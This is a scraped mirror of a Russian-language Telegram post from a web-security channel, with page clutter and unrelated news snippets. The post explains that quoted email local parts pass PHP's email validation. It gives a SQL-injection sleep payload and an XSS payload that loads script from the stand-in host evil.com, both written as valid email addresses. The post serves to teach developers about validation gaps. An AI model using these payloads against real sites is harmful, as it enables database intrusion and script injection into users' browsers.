Notice: file_put_contents(): Write of 16316 bytes failed with errno=28 No space left on device in /var/www/tgoop/post.php on line 50
Кавычка@webpwn P.289
WEBPWN Telegram 289
tgoop.com » United States » Кавычка » Telegram web » Post 289
Кавычка
После эксплутации инъекции в sql с помощью следующего email адреса

"'-sleep(5)-'"@mail.local

невольно задумываешься: а какого хера это вообще пропустило как валидный email?

В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.

Поэтому, следующая магия:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”

Провалидирует и вполне законно вернет мыло с вектором атаки: "'--><script/src=//evil.com></script>"@example.com

А там как дальше разработчики его отображают - отдельный вопрос.
www.tgoop.com/webpwn/289
22.2K viewsBo0oM



tgoop.com/webpwn/289
Create:
Last Update:

После эксплутации инъекции в sql с помощью следующего email адреса

"'-sleep(5)-'"@mail.local

невольно задумываешься: а какого хера это вообще пропустило как валидный email?

В целом, локальная часть (логин, до @) email’а может сожержать спецсимволы по RFC, если она заключена в двойные кавычки. А дальше - уже любимые языки программирования немного отходят от того, какие именно символы можно использовать.

Поэтому, следующая магия:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);”

Провалидирует и вполне законно вернет мыло с вектором атаки: "'--><script/src=//evil.com></script>"@example.com

А там как дальше разработчики его отображают - отдельный вопрос.

BY Кавычка




Share with your friend now:
tgoop.com/webpwn/289

View MORE
Open in Telegram


Telegram News

Date: |

The public channel had more than 109,000 subscribers, Judge Hui said. Ng had the power to remove or amend the messages in the channel, but he “allowed them to exist.” The visual aspect of channels is very critical. In fact, design is the first thing that a potential subscriber pays attention to, even though unconsciously. With the “Bear Market Screaming Therapy Group,” we’ve now transcended language. Other crimes that the SUCK Channel incited under Ng’s watch included using corrosive chemicals to make explosives and causing grievous bodily harm with intent. The court also found Ng responsible for calling on people to assist protesters who clashed violently with police at several universities in November 2019. End-to-end encryption is an important feature in messaging, as it's the first step in protecting users from surveillance.
from us


После эксплутации инъекции в sql с помощью следующего email адреса

 Кавычка TG
web: 289
Кавычка.Telegram web
Кавычка Telegram TG Channel
Telegram Updated:
Telegram Кавычка
FROM American